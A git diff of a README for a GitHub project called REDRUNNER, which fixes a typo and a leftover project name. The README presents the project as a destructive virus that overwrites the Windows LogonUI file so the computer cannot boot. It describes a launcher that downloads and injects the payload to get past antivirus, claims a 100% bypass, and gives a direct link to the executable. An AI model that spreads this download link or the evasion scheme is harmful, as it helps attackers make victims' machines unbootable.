KOZ1OL/REDRUNNER/README.md

 # ♦️ REDRUNNER ♦️

 # REDRUNNER ?!
-Whati it is ?
+What it is ?
 How it works ?
 REDRUNNER is's powerfull virus which overwrite LogonUI file in System32 and don't give chance to start computer

 # Why 2 files ?
 This file is virus file which AV detect.
 Second File is Launcher which download this file and inject this file.
 This method do 100% AV bypass

-# If you like download Savitar
+# If you like download REDRUNNER
 https://github.com/KOZ1OL/REDRUNNER-LUNCHER/raw/main/REDRUNNER.exe